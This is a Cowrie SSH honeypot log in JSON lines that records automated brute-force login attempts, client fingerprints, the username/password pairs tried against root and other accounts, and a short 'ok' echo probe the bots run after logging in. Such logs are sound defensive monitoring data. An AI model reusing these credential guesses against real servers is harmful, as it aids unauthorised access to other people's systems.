{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.571567Z","src_ip":"212.227.125.160","session":"ea9971235fba"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.594541Z","src_ip":"212.227.125.160","session":"ea9971235fba"}
{"eventid":"cowrie.session.connect","src_ip":"160.191.2.69","src_port":47874,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e23f273cd83","protocol":"ssh","message":"New connection: 160.191.2.69:47874 (1.2.3.4:22) [session: 8e23f273cd83]","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.599568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.600444Z","src_ip":"160.191.2.69","session":"8e23f273cd83"}
{"eventid":"cowrie.login.success","username":"root","password":"chouchou2","message":"login attempt [root/chouchou2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.666099Z","src_ip":"212.227.125.160","session":"ea9971235fba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:00.727317Z","src_ip":"212.227.125.160","session":"ea9971235fba"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.728045Z","src_ip":"212.227.125.160","session":"ea9971235fba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.751888Z","src_ip":"212.227.125.160","session":"ea9971235fba"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.752998Z","src_ip":"212.227.125.160","session":"ea9971235fba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.856300Z","src_ip":"160.191.2.69","session":"8e23f273cd83"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:46:01.921736Z","src_ip":"160.191.2.69","session":"8e23f273cd83"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:03.180116Z","src_ip":"160.191.2.69","session":"8e23f273cd83"}
{"eventid":"cowrie.session.connect","src_ip":"160.191.2.69","src_port":47880,"dst_ip":"1.2.3.4","dst_port":22,"session":"38204628c5a9","protocol":"ssh","message":"New connection: 160.191.2.69:47880 (1.2.3.4:22) [session: 38204628c5a9]","sensor":"my-vps","timestamp":"2025-08-28T11:46:03.438525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:46:03.439462Z","src_ip":"160.191.2.69","session":"38204628c5a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:46:03.697505Z","src_ip":"160.191.2.69","session":"38204628c5a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57262,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bc119ac0ae4","protocol":"ssh","message":"New connection: 212.227.125.160:57262 (1.2.3.4:22) [session: 3bc119ac0ae4]","sensor":"my-vps","timestamp":"2025-08-28T11:46:03.829175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:03.830138Z","src_ip":"212.227.125.160","session":"3bc119ac0ae4"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:46:03.853478Z","src_ip":"212.227.125.160","session":"3bc119ac0ae4"}
{"eventid":"cowrie.login.success","username":"root","password":"chocobo","message":"login attempt [root/chocobo] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:03.942985Z","src_ip":"212.227.125.160","session":"3bc119ac0ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:04.478870Z","src_ip":"212.227.125.160","session":"3bc119ac0ae4"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:46:04.479735Z","src_ip":"212.227.125.160","session":"3bc119ac0ae4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38274,"dst_ip":"1.2.3.4","dst_port":22,"session":"31c450b2e07b","protocol":"ssh","message":"New connection: 212.227.125.160:38274 (1.2.3.4:22) [session: 31c450b2e07b]","sensor":"my-vps","timestamp":"2025-08-28T11:46:04.481484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:04.482452Z","src_ip":"212.227.125.160","session":"31c450b2e07b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:04.503708Z","src_ip":"212.227.125.160","session":"3bc119ac0ae4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:04.504917Z","src_ip":"212.227.125.160","session":"3bc119ac0ae4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:46:04.845868Z","src_ip":"212.227.125.160","session":"31c450b2e07b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:05.089143Z","src_ip":"160.191.2.69","session":"38204628c5a9"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:05.273611Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:05.367529Z","src_ip":"160.191.2.69","session":"38204628c5a9"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T11:46:05.478909Z","src_ip":"212.227.125.160","session":"31c450b2e07b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:06.652052Z","src_ip":"212.227.125.160","session":"31c450b2e07b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57278,"dst_ip":"1.2.3.4","dst_port":22,"session":"b604e87c703c","protocol":"ssh","message":"New connection: 212.227.125.160:57278 (1.2.3.4:22) [session: b604e87c703c]","sensor":"my-vps","timestamp":"2025-08-28T11:46:07.607687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:07.608747Z","src_ip":"212.227.125.160","session":"b604e87c703c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:46:07.631572Z","src_ip":"212.227.125.160","session":"b604e87c703c"}
{"eventid":"cowrie.login.success","username":"root","password":"chimere","message":"login attempt [root/chimere] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:07.722794Z","src_ip":"212.227.125.160","session":"b604e87c703c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:07.792312Z","src_ip":"212.227.125.160","session":"b604e87c703c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:46:07.793153Z","src_ip":"212.227.125.160","session":"b604e87c703c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:07.824377Z","src_ip":"212.227.125.160","session":"b604e87c703c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:07.825559Z","src_ip":"212.227.125.160","session":"b604e87c703c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57292,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f39eeef359f","protocol":"ssh","message":"New connection: 212.227.125.160:57292 (1.2.3.4:22) [session: 4f39eeef359f]","sensor":"my-vps","timestamp":"2025-08-28T11:46:08.885043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:08.885930Z","src_ip":"212.227.125.160","session":"4f39eeef359f"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:46:08.908330Z","src_ip":"212.227.125.160","session":"4f39eeef359f"}
{"eventid":"cowrie.login.success","username":"root","password":"chemin","message":"login attempt [root/chemin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:08.980823Z","src_ip":"212.227.125.160","session":"4f39eeef359f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:09.043768Z","src_ip":"212.227.125.160","session":"4f39eeef359f"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:46:09.044567Z","src_ip":"212.227.125.160","session":"4f39eeef359f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:09.070480Z","src_ip":"212.227.125.160","session":"4f39eeef359f"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:09.071639Z","src_ip":"212.227.125.160","session":"4f39eeef359f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58636,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b3adb07a63b","protocol":"ssh","message":"New connection: 212.227.125.160:58636 (1.2.3.4:22) [session: 2b3adb07a63b]","sensor":"my-vps","timestamp":"2025-08-28T11:46:09.092793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:09.093673Z","src_ip":"212.227.125.160","session":"2b3adb07a63b"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:46:09.116061Z","src_ip":"212.227.125.160","session":"2b3adb07a63b"}
{"eventid":"cowrie.login.success","username":"root","password":"charmaine1","message":"login attempt [root/charmaine1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:09.190992Z","src_ip":"212.227.125.160","session":"2b3adb07a63b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:09.252583Z","src_ip":"212.227.125.160","session":"2b3adb07a63b"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:46:09.253437Z","src_ip":"212.227.125.160","session":"2b3adb07a63b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:09.278013Z","src_ip":"212.227.125.160","session":"2b3adb07a63b"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:09.279784Z","src_ip":"212.227.125.160","session":"2b3adb07a63b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58646,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3ff8290912a","protocol":"ssh","message":"New connection: 212.227.125.160:58646 (1.2.3.4:22) [session: a3ff8290912a]","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.407271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.408422Z","src_ip":"212.227.125.160","session":"a3ff8290912a"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.431100Z","src_ip":"212.227.125.160","session":"a3ff8290912a"}
{"eventid":"cowrie.login.success","username":"root","password":"cavabb","message":"login attempt [root/cavabb] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.509894Z","src_ip":"212.227.125.160","session":"a3ff8290912a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:12.603047Z","src_ip":"212.227.125.160","session":"a3ff8290912a"}
